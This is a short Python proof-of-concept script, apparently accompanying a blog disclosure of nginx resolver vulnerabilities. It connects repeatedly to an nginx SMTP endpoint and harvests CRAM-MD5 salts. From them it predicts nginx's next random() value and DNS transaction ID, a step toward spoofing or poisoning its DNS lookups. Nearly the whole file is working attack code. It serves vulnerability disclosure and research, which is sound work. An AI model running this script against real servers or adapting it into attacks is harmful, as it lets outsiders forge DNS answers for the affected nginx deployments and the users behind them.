#!/usr/bin/python 
#
# Connect to nginx's SMTP endpoint, fetches 31 CRAM-MD5 salts, and predict
# the next random() value and DNS txid nginx will use.
#
# See http://blog.zorinaq.com/nginx-resolver-vulns/
#
# -Marc Bevand

import socket, base64, re

# Specify nginx's SMTP endpoint here
host = 'localhost' 
port = 1025 

def decode_random(e):
    '''Return 344659019 from "PDM0NDY1OTAxOS4xNDcxOTgxNDg1QG15LW5hbWU+"
    ("<344659019.1471981485@my-name>")'''
    print 'Salt:', e
    m = re.match('^<([0-9]+)\..*', base64.b64decode(e))
    return int(m.group(1))

def get_random():
    size = 4096
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 
    s.connect((host,port)) 
    _ = s.recv(size)
    s.send('EHLO foo\r\n')
    _ = s.recv(size)
    s.send('AUTH CRAM-MD5\r\n')
    _ = s.recv(size)
    # We receive eg.: "334 PDM0NDY1OTAxOS4xNDcxOTgxNDg1QG15LW5hbWU+"
    if _.startswith('334 '):
        return decode_random(_[4:])
    raise Exception('AUTH did not reply with 334: ' + _)

rands = []
print "Connecting to %s:%d..." % (host, port)
# We have to open 31 different connections, or else nginx caches and returns
# the same CRAM-MD5 salt in response to all "AUTH CRAM-MD5" commands
for i in xrange(31):
    rands.append(get_random())
a = rands[0] << 1
b = rands[28] << 1
predicted0 = (a + b) >> 1
predicted1 = (a + b + 2) >> 1
print "Next random() value will be: %d (75%% prob.) or %d (25%% prob.)" % \
        (predicted0, predicted1)
print "Next DNS txid will be: %d or %d" % \
        (predicted0 & 0xffff, predicted1 & 0xffff)
